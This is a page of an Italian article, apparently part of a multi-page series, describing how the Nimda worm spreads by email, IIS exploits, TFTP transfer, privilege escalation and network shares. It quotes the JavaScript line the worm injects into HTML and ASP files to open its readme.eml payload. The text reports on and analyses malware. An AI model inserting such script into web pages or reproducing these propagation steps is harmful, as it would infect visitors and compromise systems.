Tramite un motore
SMTP integrato ed il sistema MAPI di Windows,
Nimda invia una copia di sé stesso ad ogni
indirizzo contenuto nella rubrica di Windows.
Fatto questo, Nimda inizia la scansione della
rete alla ricerca di server IIS vulnerabili
al noto bug "Web directory traversal",
già sfruttato da Code Red e dalle sue varianti,
o contenenti back door lasciate lì da Code
Red II o Sadmind/IIS.
Dai log dei server Web risulta che il worm,
per ogni server IIS, tenta una sequenza di
ben 16 attacchi, talvolta ripetendo la sequenza
anche più volte in successione. Nel caso riesca
a bucare il server, il worm provvede a trasferirsi
sulla nuova vittima copiando, attraverso il
protocollo TFTP, il file admin.dll
nelle root directory del server. Una volta
eseguito, questo worm aggiungerà l'utente
guest locale nel gruppo Administrators in
modo da dargli i massimi privilegi. Fatto
ciò, Nimda si assicurerà che il disco C$=C:\
sia condiviso per poi iniziare l'opera di
scansione della rete sulla porta HTTP/80 e
propagarsi sulle macchine locali attraverso
le condivisioni di rete (dischi e cartelle).
Quando il virus trova
una cartella condivisa vi copia al suo interno
un file di nome readme con estensione
NWS (Newsgroup Posting) o EML (E-Mail) contenente
in allegato il codice virale: come si è
visto in precedenza per Outlook, anche in
questo caso se questo file viene eseguito
con una versione di IE pari o inferiore
alla 5.5SP1, l'allegato verrà eseguito in
automatico.
Il CERT aggiunge che il virus si preoccupa
anche di infettare diversi tipi di file
eseguibili da un browser Web, come quelli
HTML e ASP, ed appendervi le seguenti linee
di codice JavaScript:
<script language="JavaScript">
window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script>
In questo modo, il
worm ha l'opportunità di infettare altri utenti
che con un browser navighino all'interno della
rete locale o di un sito remoto.
.
CONTINUA>>
1. E' allarme sul
Net
2. Un bollettino di
guerra
3. Infezione atto
I
4. Infezione atto II
5. Come scovarlo e
ucciderlo
|
